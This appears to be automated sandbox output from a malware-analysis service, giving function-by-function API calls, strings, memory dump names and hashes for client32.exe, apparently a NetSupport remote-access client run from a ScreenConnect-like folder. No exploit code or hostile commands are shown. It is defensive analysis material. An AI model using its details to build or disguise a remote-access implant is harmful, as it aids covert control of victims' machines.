Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11177D16,000000FF), ref: 110FA8A3
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 110FA8EC
std::exception::exception.LIBCMT ref: 110FA94E
__CxxThrowException@8.LIBCMT ref: 110FA963

Strings

Wtsapi32.dll, xrefs: 110FA89E
Advapi32.dll, xrefs: 110FA8A5

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID: Advapi32.dll$Wtsapi32.dll
API String ID: 2851125068-2390547818
Opcode ID: 7b5a67d0d7e6fc342c5240c02ecf1f6de07eae797b0811734f0d9ddd45c46463
Instruction ID: 76f8521da47cb9eef126f9e1764ac0a5dc6ee811a268475dced5a0fa713519db
Opcode Fuzzy Hash: 7b5a67d0d7e6fc342c5240c02ecf1f6de07eae797b0811734f0d9ddd45c46463
Instruction Fuzzy Hash: 0841F1B5C09B449EC761CF6A8980BDAFBE8FFA9604F00495ED5AEA3210D7787500CF65

Function 11129720 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1112974A
GetTickCount.KERNEL32 ref: 11129751

Strings

AutoICFConfig, xrefs: 11129770
DoICFConfig() OK, xrefs: 111297F6
Client, xrefs: 11129775
DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 1112980C

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick
String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
API String ID: 536389180-1512301160
Opcode ID: aff00621680e15bca7df80a477e2c46395d09f16941bc071ca53205ca28342e8
Instruction ID: 786b3b8ff38a1ee801cdeddb6cd7e762267a6f84b7e4e6377bde446301b07f06
Opcode Fuzzy Hash: aff00621680e15bca7df80a477e2c46395d09f16941bc071ca53205ca28342e8
Instruction Fuzzy Hash: 0221C674E062FDADEF118E38AA88785FA8257403ADF54047DED1546288FBE45540CB91

Function 6CC67B70 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 61COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,007C46C7,6CC719A4,00000000,00000000,6CC719A4,00000007,?,6CC67C54,?,6CC719A4,00000001,00000000,-000391A4,6CC719A4), ref: 6CC67BB1

Strings

ReadSocket - Connection has been closed by peer, xrefs: 6CC67BCF
ReadSocket - Error %d reading response, xrefs: 6CC67BE9
e:\nsmsrc\nsn\300\cva_300f1\ctl32\htctl.c, xrefs: 6CC67B8E
hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6CC67B93

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID:
String ID: ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$e:\nsmsrc\nsn\300\cva_300f1\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
API String ID: 0-2647837471
Opcode ID: 0d80516daa50ba9e09b06cb86a56642cac09b0dec733875f8e57526e0442d69a
Instruction ID: ec1adbafa72d964a60e7b2c8bdf43d9fc60e06254236e12abece61a9c37d0a0f
Opcode Fuzzy Hash: 0d80516daa50ba9e09b06cb86a56642cac09b0dec733875f8e57526e0442d69a
Instruction Fuzzy Hash: B901B1B76146046FE7109EB9FDC0EA7B3D9EBC4278B144826F948C3E01F621E80A46A0

Function 11024B50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11024B66
K32GetProcessImageFileNameA.KERNEL32(?,?,?,110FA74F,00000000,00000000,?,110F9A67,00000000,?,00000104), ref: 11024B82
GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11024B96
SetLastError.KERNEL32(00000078,110FA74F,00000000,00000000,?,110F9A67,00000000,?,00000104), ref: 11024BB9

Strings

GetProcessImageFileNameA, xrefs: 11024B60
GetModuleFileNameExA, xrefs: 11024B90

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorFileImageLastNameProcess
String ID: GetModuleFileNameExA$GetProcessImageFileNameA
API String ID: 4186647306-532032230
Opcode ID: 84560621c8239c997dca9898e9568f965929ea78fcfc08c59426f9e676b42ff4
Instruction ID: d3a79397b9aca74b41b2e47cdc2cb53976e07f1183ce263d33de4038ac76f0b1
Opcode Fuzzy Hash: 84560621c8239c997dca9898e9568f965929ea78fcfc08c59426f9e676b42ff4
Instruction Fuzzy Hash: 3C011B76B40614AFD721DEA5DC84F5BB7FCEB88665F01492AE985D6640D630E8008BA0

Function 11102700 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EDC3F0,00000000,?,11103735,111032D0,00000001,00000000), ref: 11102717
CreateThread.KERNEL32(00000000,11103735,00000001,00000000,00000000,0000000C), ref: 1110273A
WaitForSingleObject.KERNEL32(?,000000FF,?,11103735,111032D0,00000001,00000000,?,?,?,?,?,1102F49F), ref: 11102767
CloseHandle.KERNEL32(?,?,11103735,111032D0,00000001,00000000,?,?,?,?,?,1102F49F), ref: 11102771

Strings

hThread, xrefs: 11102750
..\ctl32\Refcount.cpp, xrefs: 1110274B

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID: ..\ctl32\Refcount.cpp$hThread
API String ID: 3360349984-1136101629
Opcode ID: 11b5fb0dee8cbdce21d593dae7f6460e58f7565787492cb323c1118e16b37232
Instruction ID: 500c2b3c3357f9213b13d9fe8d1126e8dc21d1a7e49489592dffc9e6a9027773
Opcode Fuzzy Hash: 11b5fb0dee8cbdce21d593dae7f6460e58f7565787492cb323c1118e16b37232
Instruction Fuzzy Hash: 1C01717A7007116FE3218E95DC85F9BFBA8EB56764F108528FA15962C0D770E4058BB0

Function 11109440 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,System\CurrentControlSet\Control\GraphicsDrivers\DCI,00000000,0002001F,?), ref: 1110946F
RegCloseKey.ADVAPI32(00000000), ref: 111094A7
RegSetValueExA.ADVAPI32(00000000,Timeout,00000000,00000004,00000000,00000004), ref: 111094C3
RegCloseKey.ADVAPI32(00000000), ref: 111094CD

Part of subcall function 11132450: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110291B,75A78400,?,?,1113451F,00000000,CSDVersion,00000000,00000000,?), ref: 11132470

Strings

System\CurrentControlSet\Control\GraphicsDrivers\DCI, xrefs: 1110945E
Timeout, xrefs: 1110948E, 111094BD

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseValue$OpenQuery
String ID: System\CurrentControlSet\Control\GraphicsDrivers\DCI$Timeout
API String ID: 3962714758-504756767
Opcode ID: 593e1dd38c13c10e7a4daff4c42b3bccf59c301c76992b28c9cb3cfbd63388de
Instruction ID: e2b4fe1a7407c51d3679897667db751a92ae8154eaac79b11ee734c705fb4573
Opcode Fuzzy Hash: 593e1dd38c13c10e7a4daff4c42b3bccf59c301c76992b28c9cb3cfbd63388de
Instruction Fuzzy Hash: 33019279B40209FFEB00EF90DD4AFAEF778AB44709F008045FE18A7184D6B0A614DBA1

Function 1102FD80 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1102FDC7

Strings

_HW, xrefs: 1102FD90
580913, xrefs: 1102FDAE
_SW, xrefs: 1102FD9C
_HF, xrefs: 1102FDA8, 1102FDAD
%s%s%s.bin, xrefs: 1102FDC1

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %s%s%s.bin$580913$_HF$_HW$_SW
API String ID: 2111968516-195920341
Opcode ID: 5343a590b740c9c9738c92f8b8acd3bf342b6db108878fabbc709ed31f555550
Instruction ID: c25928671520f454b92b43ec0ad7b42779770566938daa2e780b2e5a9d994659
Opcode Fuzzy Hash: 5343a590b740c9c9738c92f8b8acd3bf342b6db108878fabbc709ed31f555550
Instruction Fuzzy Hash: CBE09260D0420C2BF600A1488C05BDBBB9F1740399FC0C044BEABAA286FD249400869B

Function 6CC74F90 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 158COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 6CC74FA1

Part of subcall function 6CC761A0: _memset.LIBCMT ref: 6CC761BF
Part of subcall function 6CC761A0: _strncpy.LIBCMT ref: 6CC761CB

Part of subcall function 6CC68C00: EnterCriticalSection.KERNEL32(6CCA9898,?,?,00000000,?,6CC6C0C1,?,00000000), ref: 6CC68C23
Part of subcall function 6CC68C00: InterlockedExchange.KERNEL32(?,00000000), ref: 6CC68C88
Part of subcall function 6CC68C00: Sleep.KERNEL32(00000000,?,6CC6C0C1,?,00000000), ref: 6CC68C9E
Part of subcall function 6CC68C00: LeaveCriticalSection.KERNEL32(6CCA9898,00000000), ref: 6CC68CD0

Strings

1.2, xrefs: 6CC74FD3
Channel, xrefs: 6CC75105
Publish %d pending services, xrefs: 6CC750D7
Client, xrefs: 6CC7510A

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
String ID: 1.2$Channel$Client$Publish %d pending services
API String ID: 1112461860-1140593649
Opcode ID: 114f73fa8ed3fe8618df5ac0c3db4db6ca5855c57eda8451f30a038b09343900
Instruction ID: ed9ac5ea252dd5fecd8d3c2de22794edbbfe84a0809a5a41508692275b14c98d
Opcode Fuzzy Hash: 114f73fa8ed3fe8618df5ac0c3db4db6ca5855c57eda8451f30a038b09343900
Instruction Fuzzy Hash: B051C531B002458BEB21DAB5E95CBAE37B5EB4234CF240529D452C7E81FB71948ACB72

Function 110F6190 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 110F61E3
GetStockObject.GDI32(00000004), ref: 110F623B
RegisterClassA.USER32(?), ref: 110F624F
CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00100000,00000000,00000000,00000000), ref: 110F628A

Strings

NSMDesktopWnd, xrefs: 110F61C9, 110F6248, 110F6284

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomClassCreateGlobalObjectRegisterStockWindow
String ID: NSMDesktopWnd
API String ID: 2669163067-206650970
Opcode ID: 173f293a3e361e7ef0e65a549ff519908d5edf4eb24d47ef909566306d25e691
Instruction ID: 346a4b555008fa5bb99351eae23e3b1030b3e8e24f27a1909c2d26c4daee2dcd
Opcode Fuzzy Hash: 173f293a3e361e7ef0e65a549ff519908d5edf4eb24d47ef909566306d25e691
Instruction Fuzzy Hash: 0F31E5B5D05659AFCB40DFA9D884A9EFBF8FB09714F50862EE819E3244E7345900CB94

Function 6CC64FD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84networkCOMMON

Download Yara Rule

APIs

Part of subcall function 6CC78210: _strncpy.LIBCMT ref: 6CC78234

inet_addr.WSOCK32(?,?,?,?,?,?,00002000,Gateway_WebProxy,00000000), ref: 6CC65051
gethostbyname.WSOCK32(?,?,?,?,?,?,00002000,Gateway_WebProxy,00000000), ref: 6CC65062
WSAGetLastError.WSOCK32(?,?,?,?,?,?,00002000,Gateway_WebProxy,00000000), ref: 6CC6508D

Strings

Cannot resolve hostname %s, error %d, xrefs: 6CC65096
Gateway_WebProxy, xrefs: 6CC64FEA

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: ErrorLast_strncpygethostbynameinet_addr
String ID: Cannot resolve hostname %s, error %d$Gateway_WebProxy
API String ID: 2603238076-4066638241
Opcode ID: c52013304b783476af0235be0db37a76e284d86725936cba8bd21b96bbef100a
Instruction ID: 2fa6fa43e443a226c3263fe3a06d52f90a3b0a258bc1810549ac456176ebca36
Opcode Fuzzy Hash: c52013304b783476af0235be0db37a76e284d86725936cba8bd21b96bbef100a
Instruction Fuzzy Hash: 8521B731A011089FDB20DB65DC80FEAB7B8EF44218F508599E949D7A41FF71D949CBA1

Function 11134660 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111346D0
RegCloseKey.ADVAPI32(?), ref: 11134734

Strings

ForceRTL, xrefs: 111346F3
SOFTWARE\Productive Computer Insight\PCICTL, xrefs: 11134697, 111346CE
SOFTWARE\NetSupport Ltd\PCICTL, xrefs: 111346B0

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpen
String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
API String ID: 47109696-3245241687
Opcode ID: 9d12ddab663f0bade2c9311f31fb996a2d55a49d3ba79c2b1d99accddb9a637b
Instruction ID: 7a7cfa5f29f4a3e9be51cc667e7100b43bb54833ec5544d3ab887deb0b5b3a13
Opcode Fuzzy Hash: 9d12ddab663f0bade2c9311f31fb996a2d55a49d3ba79c2b1d99accddb9a637b
Instruction Fuzzy Hash: F9210AB9E5062ADBE721DE64CD80FDAF7B8AB85319F1041AAD81DF3244D630DD448BA0

Function 111049C0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 11104920: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110494A
Part of subcall function 11104920: __wsplitpath.LIBCMT ref: 11104965
Part of subcall function 11104920: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 11104999

GetComputerNameA.KERNEL32(?,?), ref: 11104A68

Strings

\Registry\Machine\SOFTWARE\Classes\N%x, xrefs: 11104A10
\Registry\Machine\SOFTWARE\Classes\N%x.%s, xrefs: 11104A77
, xrefs: 11104A61
ACM, xrefs: 11104A22

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
API String ID: 806825551-1858614750
Opcode ID: 901a4ed7de8df71ce125f945868b5c0093e215064daac697b613a1a223286f3b
Instruction ID: e7f9985d51565af38080bde2b7bad96e9363af9279f09dbbe9d4585dd592ed72
Opcode Fuzzy Hash: 901a4ed7de8df71ce125f945868b5c0093e215064daac697b613a1a223286f3b
Instruction Fuzzy Hash: 72214636E441859AE701CE709EC0BFFBFAADF85214F0481ACEC52C7502E726EA04C790

Function 11133650 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 11133070: GetCurrentProcess.KERNEL32(11027FDF,?,111332C3,?), ref: 1113307C
Part of subcall function 11133070: GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\MScreenConnect\client32.exe,00000104,?,111332C3,?), ref: 11133099

WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111336A5
ResetEvent.KERNEL32(00000260), ref: 111336B9
SetEvent.KERNEL32(00000260), ref: 111336CF
